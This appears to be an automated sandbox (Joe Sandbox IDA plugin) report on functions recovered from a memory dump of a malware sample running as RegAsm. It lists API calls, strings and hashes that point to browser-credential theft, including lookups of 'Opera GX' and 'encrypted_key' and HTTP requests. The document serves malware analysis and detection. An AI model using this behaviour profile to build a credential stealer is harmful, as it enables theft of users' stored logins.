                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: ERROR
                                                    • API String ID: 1659193697-2861137601
                                                    • Opcode ID: 63e6eed9abdabe16e44a68f7f9864da067214aca1ca454f7c695c55e2f80d023
                                                    • Instruction ID: 4cb9426ee5e73f282c12afd8d592c338adc4812851f741afb7acd22160182d69
                                                    • Opcode Fuzzy Hash: 63e6eed9abdabe16e44a68f7f9864da067214aca1ca454f7c695c55e2f80d023
                                                    • Instruction Fuzzy Hash: 6B3184B1E10204ABCF00EBA5DD46AEE7778FB15318F10051AF502E73A1DB389940CBA9
                                                    Function 00418E9E Relevance: 4.5, APIs: 3, Instructions: 45sleepsynchronizationthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                    • CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    • Sleep.KERNEL32(000003E8,?,00000000,?,?), ref: 00418EA5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateObjectOpenSingleSleepThreadWait
                                                    • String ID:
                                                    • API String ID: 1990444757-0
                                                    • Opcode ID: db982492dfe86fd64df0525366e688e2b4b5a29edeeaa01de3fa1648289cf0de
                                                    • Instruction ID: 5657c23587d86dbe871ff5d5566c82c5f00d4f8eb17df63da99cc315ca23b86c
                                                    • Opcode Fuzzy Hash: db982492dfe86fd64df0525366e688e2b4b5a29edeeaa01de3fa1648289cf0de
                                                    • Instruction Fuzzy Hash: 52011774640204EBDB21EF21DC46BEC3B65BB11709F54412AF9169A1B1DB399A82CF89
                                                    Function 00413563 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,004154AA), ref: 00413576
                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00413596
                                                    • CloseHandle.KERNEL32(00000000), ref: 0041359F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                    • String ID:
                                                    • API String ID: 3183270410-0
                                                    • Opcode ID: 424327ca4c3cbaa72694fe0256f2ae6f23efaf6e2f470c7a486978a51854163c
                                                    • Instruction ID: 648301d2c24216510959a40647cebe15a857575c5a4660e0673f59272e1cdbeb
                                                    • Opcode Fuzzy Hash: 424327ca4c3cbaa72694fe0256f2ae6f23efaf6e2f470c7a486978a51854163c
                                                    • Instruction Fuzzy Hash: 68F0F27890120CFFDB11EFA0DC0AFDC7BB9AB09709F1444A5B615AA1A0D7B1ABD4DB44
                                                    Function 0040D1C6 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 379COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00425200,00425200,?,?), ref: 0040D201
                                                      • Part of subcall function 00412F92: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00412F4C: GetFileAttributesA.KERNEL32(00000000,?,0040E526,?,00425200,?,?), ref: 00412F5B
                                                      • Part of subcall function 00407F8E: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00407FDF
                                                      • Part of subcall function 00407F8E: memcmp.MSVCRT ref: 00408034
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                    • String ID: Opera GX
                                                    • API String ID: 1439182418-3280151751
                                                    • Opcode ID: 0fb77b7b81ea3809c0307192b11be850f65fcb2790e200c338288ed7b6fd4c59
                                                    • Instruction ID: fb3989cb2523bfc062273a9d11041c6471dda5227b0977fe00502919fff50608
                                                    • Opcode Fuzzy Hash: 0fb77b7b81ea3809c0307192b11be850f65fcb2790e200c338288ed7b6fd4c59
                                                    • Instruction Fuzzy Hash: 4BD113729001089ADF14FBF1DD56EEE737CAF14305F50412BF616A21E1EE39AB88CA59
                                                    Function 00407902 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualProtect.KERNEL32(00EBE9FC,458B0874,00000002,00000002), ref: 004079D0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID: @
                                                    • API String ID: 544645111-2766056989
                                                    • Opcode ID: 287ad8346a7fe6e5c9c93bd88e2f49757a3d10b5b68bd008e028ca123d1bf971
                                                    • Instruction ID: 108c03afaf6488205a77675aa431fcd5872e35c29fe2ccaab908e516a6f44892
                                                    • Opcode Fuzzy Hash: 287ad8346a7fe6e5c9c93bd88e2f49757a3d10b5b68bd008e028ca123d1bf971
                                                    • Instruction Fuzzy Hash: 2D31CBB5D08209EFEB10CF98C545BADBBF1FB04304F1485A6D455AB391D378AA81DF46
                                                    Function 00417E48 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00406312: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406373
                                                      • Part of subcall function 00406312: StrCmpCA.SHLWAPI(?), ref: 00406390
                                                      • Part of subcall function 00406312: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004063BE
                                                      • Part of subcall function 00406312: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00400100,00000000), ref: 0040640A
                                                      • Part of subcall function 00406312: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00406442
                                                      • Part of subcall function 00406312: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406453
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00417E8B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                    • String ID: ERROR
                                                    • API String ID: 3287882509-2861137601
                                                    • Opcode ID: bb33d87117d8667f9c5c7158566ed321b33361f7c494144e9eddfb2cb9a39704
                                                    • Instruction ID: b6725acd924a18acdeaf76a85a33531c260c99ef83c6fe063ac976ef0ea738d9
                                                    • Opcode Fuzzy Hash: bb33d87117d8667f9c5c7158566ed321b33361f7c494144e9eddfb2cb9a39704
                                                    • Instruction Fuzzy Hash: 4B11D0319101089BCB14FFA2E8569DD7378AF50309F50412EF916971F2EF39AB48C788
                                                    Function 00412F4C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,?,0040E526,?,00425200,?,?), ref: 00412F5B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID: &@
                                                    • API String ID: 3188754299-4010431647
                                                    • Opcode ID: c554d616c374e849fdf741f0e5d4d7b9930fb9937f03e0365571ee75c380a818
                                                    • Instruction ID: 5a9ed636e313f6a7dd176774e2c6308ea72efcd30315a16af32adb4bfda7ee87
                                                    • Opcode Fuzzy Hash: c554d616c374e849fdf741f0e5d4d7b9930fb9937f03e0365571ee75c380a818
                                                    • Instruction Fuzzy Hash: 4CF0C074C1020CEBCB00DFA5D5456DDB774AB11359F108156E522E72A0E7789B96DF44
                                                    Function 00412667 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 00412674
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentProfilelstrcpy
                                                    • String ID: Unknown
                                                    • API String ID: 2831436455-1654365787
                                                    • Opcode ID: 6f65f47d843f5c38b1e0a66190c485fb9fc1308ec2868120a4b7116f04a99c60
                                                    • Instruction ID: 79ae12f52d30196ee2c5170817a78a3de43ea3cd72a751e4cea9930dc4e20eb0
                                                    • Opcode Fuzzy Hash: 6f65f47d843f5c38b1e0a66190c485fb9fc1308ec2868120a4b7116f04a99c60
                                                    • Instruction Fuzzy Hash: 0CE04F30600108EFCF10EF65D881EDD37ACBB04788F50402AF905D7190DB74E995CB98
                                                    Function 1FA504D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • failed to allocate %u bytes of memory, xrefs: 1FA504E7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: failed to allocate %u bytes of memory
                                                    • API String ID: 0-1168259600
                                                    • Opcode ID: 71fc717d39385746ce01d833d133baacc4281054a6983ea744a558fc2677734e
                                                    • Instruction ID: bd317ca2fc4ab4041da5aaa61827870f4c610bcf78cad84484092b92f7e03648
                                                    • Opcode Fuzzy Hash: 71fc717d39385746ce01d833d133baacc4281054a6983ea744a558fc2677734e
                                                    • Instruction Fuzzy Hash: 04C0127AEC832263C7511294BD01ECA79914F50591F054034FD4C59330D56DB8A193D3
                                                    Function 004090FB Relevance: 2.7, APIs: 2, Instructions: 196stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • lstrlenA.KERNEL32(00000000), ref: 004092EF
                                                    • lstrlenA.KERNEL32(00000000), ref: 00409303
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00418DB9: _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                      • Part of subcall function 00418DB9: CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                      • Part of subcall function 00418DB9: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$lstrcat$CreateObjectOpenSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 3799617333-0
